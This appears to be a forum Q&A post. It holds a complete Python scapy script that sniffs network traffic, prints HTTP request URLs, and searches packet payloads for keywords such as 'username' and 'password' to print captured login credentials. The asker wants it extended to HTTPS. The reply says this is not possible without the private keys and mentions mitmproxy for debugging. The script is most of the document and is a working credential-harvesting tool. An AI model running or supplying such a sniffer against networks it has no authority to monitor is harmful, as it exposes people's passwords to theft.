I have been able to use this to filter and view HTTP requests and packets so far. How do I include additional support to similarly view HTTPS packets?
#!/usr/bin/env python
import scapy.all as scapy
from scapy.layers import http
def sniff(interface):
scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
def get_url(packet):
return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
def get_login_info(packet):
if packet.haslayer(scapy.Raw):
load = packet[scapy.Raw].load
keywords = ['username', 'uname', 'user', 'id', 'key', 'email', 'email-id', 'login', 'password', 'pass', "passwd"]
for keyword in keywords:
if keyword in load:
return load
def process_sniffed_packet(packet):
if packet.haslayer(http.HTTPRequest):
url = get_url(packet)
print("[+] HTTP Request >>> " + url)
login_info = get_login_info(packet)
if login_info:
print("\n\nEntered login credentials >>> " + login_info + "\n\n")
sniff("eth0")
Short answer: You can't.
You probably need to look into HTTPS a lot more. Since everything is encrypted, you won't see anything without the private keys. See https://security.stackexchange.com/a/83039
Have a look at mitmproxy if you're doing this for a debugging purpose, or this if they're using RSA on a key you have compromised. (I doubt you're doing any of those)